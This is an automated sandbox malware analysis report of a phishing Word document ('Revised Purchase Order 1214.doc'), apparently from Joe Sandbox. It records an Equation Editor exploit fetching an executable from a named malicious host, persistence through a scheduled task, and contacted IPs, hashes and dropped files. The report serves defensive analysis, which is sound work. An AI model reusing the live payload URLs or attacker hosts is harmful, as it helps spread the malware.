http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	pridingnsjhfhdjs.exe, 00000004.00000002.2144136289.00000000054C0000.00000002.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2397057419.0000000005CC0000.00000002.00000001.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl0	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.securetrusm	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	pridingnsjhfhdjs.exe, 00000004.00000002.2144136289.00000000054C0000.00000002.00000001.sdmp, pridingnsjhfhdjs.exe, 00000007.00000002.2397057419.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.certicamara.com0	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-a/cacrl.crl0	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.firmaprofesional.com0	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.chamb	pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net0D	pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.wellsfargo.com/certpolicy0	pridingnsjhfhdjs.exe, 00000007.00000002.2397947680.00000000062D0000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	pridingnsjhfhdjs.exe, 00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmp	false		high
https://secure.comodo.com/CPS0	pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	false		high
http://Gspsks.com	pridingnsjhfhdjs.exe, 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	pridingnsjhfhdjs.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servername/isapibackend.dll	pridingnsjhfhdjs.exe, 00000007.00000002.2401524278.00000000081A0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://cps.chambersign.org/cps/chamber	pridingnsjhfhdjs.exe, 00000007.00000002.2401991014.00000000086E7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	pridingnsjhfhdjs.exe, 00000007.00000002.2397851324.0000000006220000.00000004.00000001.sdmp	false		high
http://www.ssc.lt/cps03	pridingnsjhfhdjs.exe, 00000007.00000002.2401972476.00000000086D0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.252.37.193	unknown	Malaysia		45144	NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	true
198.54.122.60	unknown	United States		22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	349841
Start date:	08.02.2021
Start time:	10:27:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Revised Purchase Order 1214.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@8/15@9/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.7% (good quality ratio 1%) Quality average: 41.6% Quality standard deviation: 34.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 69 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 2.20.142.209, 2.20.142.210 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:27:40	API Interceptor	351x Sleep call for process: EQNEDT32.EXE modified
10:28:01	API Interceptor	1314x Sleep call for process: pridingnsjhfhdjs.exe modified
10:28:04	API Interceptor	1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
43.252.37.193	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	globalteamacademy.com/showcase/bill/6vWjC1g7qA0Z76f.exe
	Request- NAVALTECH.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/zic/KlalU0GjxacVNEE.exe
	Quotation-20441.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exe
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe
	New ORDER 092134..doc	Get hash	malicious	Browse	globalteamacademy.com/docct/dj/fBqZ0SFcHFfoBIY.exe
	RFQ A50924-E001.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/zi/SAM.exe
	quotation085312456.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/pll/PALLS.exe
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/ja/JASP.exe
198.54.122.60	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse
	veHKklzK74heP6u.exe	Get hash	malicious	Browse
	Inquiry_0197832.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exe	Get hash	malicious	Browse
	U2LameOT02.exe	Get hash	malicious	Browse
	Request- NAVALTECH.doc	Get hash	malicious	Browse
	Quotation-20441.doc	Get hash	malicious	Browse
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse
	New ORDER 092134..doc	Get hash	malicious	Browse
	i0K5YoZXLi.exe	Get hash	malicious	Browse
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
globalteamacademy.com	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	43.252.37.193
	Request- NAVALTECH.doc	Get hash	malicious	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	43.252.37.193
	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193
mail.privateemail.com	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	198.54.122.60
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	veHKklzK74heP6u.exe	Get hash	malicious	Browse	198.54.122.60
	Inquiry_0197832.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exe	Get hash	malicious	Browse	198.54.122.60
	U2LameOT02.exe	Get hash	malicious	Browse	198.54.122.60
	Request- NAVALTECH.doc	Get hash	malicious	Browse	198.54.122.60
	Quotation-20441.doc	Get hash	malicious	Browse	198.54.122.60
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	198.54.122.60
	New ORDER 092134..doc	Get hash	malicious	Browse	198.54.122.60
	i0K5YoZXLi.exe	Get hash	malicious	Browse	198.54.122.60
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	198.54.122.60

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	198.54.122.60
	INV411422.xls	Get hash	malicious	Browse	198.54.120.71
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	#U260e#Ufe0fmsg0091January_report_2021.HTM	Get hash	malicious	Browse	198.54.115.249
	N4GjPirQhmtozOW.exe	Get hash	malicious	Browse	199.193.7.228
	veHKklzK74heP6u.exe	Get hash	malicious	Browse	198.54.122.60
	Inquiry_0197832.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.798.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.10964.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.164.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.30875.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.26409.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.1327.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.PWS.Stealer.21240.29506.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.8979.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.GenericKDZ.72843.9200.exe	Get hash	malicious	Browse	198.54.122.60
	ztx85QLpZB.exe	Get hash	malicious	Browse	199.188.200.97
	U2LameOT02.exe	Get hash	malicious	Browse	198.54.122.60
	#U260e#Ufe0fmsg0100February_report_2021.HTM	Get hash	malicious	Browse	198.54.115.249
	GIuEtCOYbL.exe	Get hash	malicious	Browse	199.193.7.228
NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	43.252.37.193
	Request- NAVALTECH.doc	Get hash	malicious	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	43.252.37.193
	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193
	PAYMENT 25SW Aug-06-2018.doc	Get hash	malicious	Browse	182.239.42.250

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.0847546854849544
Encrypted:	false
SSDEEP:	6:kKRbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Q3kPlE99SNxAhUeo+aKt
MD5:	E050C94DDB1E5D525D7535EC2953BE53
SHA1:	722F82220D9281CF913EBC9544E3F66243CB344F
SHA-256:	66AEA140B30A6DB246E9A7AD3142635D55BE675F04158C7335606DD10C07E374
SHA-512:	CA24B0A2F9915952C8E0EEF552024FC2A22366B4BCB6614788CF6D4FC2D7BC320FE1E35031A06F02AADD0CE1AA4764F722EA7C12F396CB41B67EA8B14E879A10
Malicious:	false
Reputation:	low
Preview:	p...... .........B<!W...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TrC86HH4pxVZ49N[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	734720
Entropy (8bit):	7.6904916579877
Encrypted:	false
SSDEEP:	12288:/ytZi970Oz6hGyBh7WVQlW9QWwJnKSr9Iz5JpqbvsKcDDgqnpLTm:/gZ7BhaVQlW9QWwpnr9IzHsTWgcpLTm
MD5:	CEDD3570A65CE74199167DA6E5190CC4
SHA1:	A3BB3123551BEF96ADCDC4487E1D2B32752D65F7
SHA-256:	5158FFB1CEECEC8B07B14DC463CC8356283A006443A0D6201D91222AC52BAE03
SHA-512:	9C1C4C290AD5611B480119EFB81244F889370AC4F36380EBDA64058FB19F2424CDE1B9DB1F3339BDE330B8897CE1179D7EE1415DAC129D6A52671E9D65636824
Malicious:	true
Reputation:	low
IE Cache URL:	http://globalteamacademy.com/showcase/pal/TrC86HH4pxVZ49N.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... `................. ..........>>... ........@.. ....................................@..................................=..W....@.......................`....................................................... ............... ..H............text...D.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......4..............@..B................ >......H........$..\...........(...`C...........................................0............(....(..........(.....o..........................(.......(.......(.......(.......(......N..(....o....(.....&..(........s.........s.........s.........s.........s..........0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0.................,.........o....+....9....~.........,2~.........(....o .....,.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADBC433-349E-46EF-BF24-C3A751787722}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5F6AD7-3C7C-4823-93B4-8E22DB7DEE25}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.8790639092877375
Encrypted:	false
SSDEEP:	3:tlDXT91lZlwlj2lfgREqAWlglqlg7tlhlhlWlllljlll8v0lglwZsl8gl7vlI9:TD9RqwNgREqAWlgFJA//jlll8vlw2FrA
MD5:	E7171C90A42F5A8BBDA6F50048C9BF36
SHA1:	58E96A64997B44999321B05C925C92AB39C31006
SHA-256:	C4E72B371913D2BC9B28262545E51C469FB0C46C046D99F3C69191CD1F488094
SHA-512:	F0C54B1853CF35585AC3C6D3928671CBB183B0928CF8752583014BFD6360E4F79B2E8755D09A271BB6687AFA91D45685A13F342F7EF141FC10C8423B2690B7E2
Malicious:	false
Reputation:	low
Preview:	. . . . . . . . . . . . . . . . . . . . . . . . . .2.5.6.8.5.2._.3.8.0.0.2.2.2.3.8.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.........................................................................................................................................................................................................................................................................................................................................................................................................V...\.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ

C:\Users\user\AppData\Local\Temp\Cab11CF.tmp Download File
Process:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar11D0.tmp Download File
Process:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
File Type:	data
Category:	modified
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\tmp40B9.tmp Download File
Process:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1623
Entropy (8bit):	5.150162218405015
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBWtn:cbhZ7ClNQi/rydbz9I3YODOLNdq36
MD5:	1848B4AEC2785B06DFAB71736CFCD778
SHA1:	CCF0A17A895F114FCF3B3B7FA166AA21ACC68B64
SHA-256:	09095E3D18205126167F420AD20F1AF178D384B32F0D72EB0A3441F50923E3E7
SHA-512:	B7AF56E8A0F6BA7354790E5D17353ABC93325A09FA430BFCF5CBC0B93FE45BAB21080C7077135DCC54D11FE81FAD9E4EC24B5CFC049C1544AF68DF61D22CC60B
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\DsVdJeRPpef.exe Download File
Process:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	734720
Entropy (8bit):	7.6904916579877
Encrypted:	false
SSDEEP:	12288:/ytZi970Oz6hGyBh7WVQlW9QWwJnKSr9Iz5JpqbvsKcDDgqnpLTm:/gZ7BhaVQlW9QWwpnr9IzHsTWgcpLTm
MD5:	CEDD3570A65CE74199167DA6E5190CC4
SHA1:	A3BB3123551BEF96ADCDC4487E1D2B32752D65F7
SHA-256:	5158FFB1CEECEC8B07B14DC463CC8356283A006443A0D6201D91222AC52BAE03
SHA-512:	9C1C4C290AD5611B480119EFB81244F889370AC4F36380EBDA64058FB19F2424CDE1B9DB1F3339BDE330B8897CE1179D7EE1415DAC129D6A52671E9D65636824
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... `................. ..........>>... ........@.. ....................................@..................................=..W....@.......................`....................................................... ............... ..H............text...D.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......4..............@..B................ >......H........$..\...........(...`C...........................................0............(....(..........(.....o..........................(.......(.......(.......(.......(......N..(....o....(.....&..(........s.........s.........s.........s.........s..........0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0.................,.........o....+....9....~.........,2~.........(....o .....,.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Revised Purchase Order 1214.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Mon Feb 8 17:27:39 2021, length=234075, window=hide
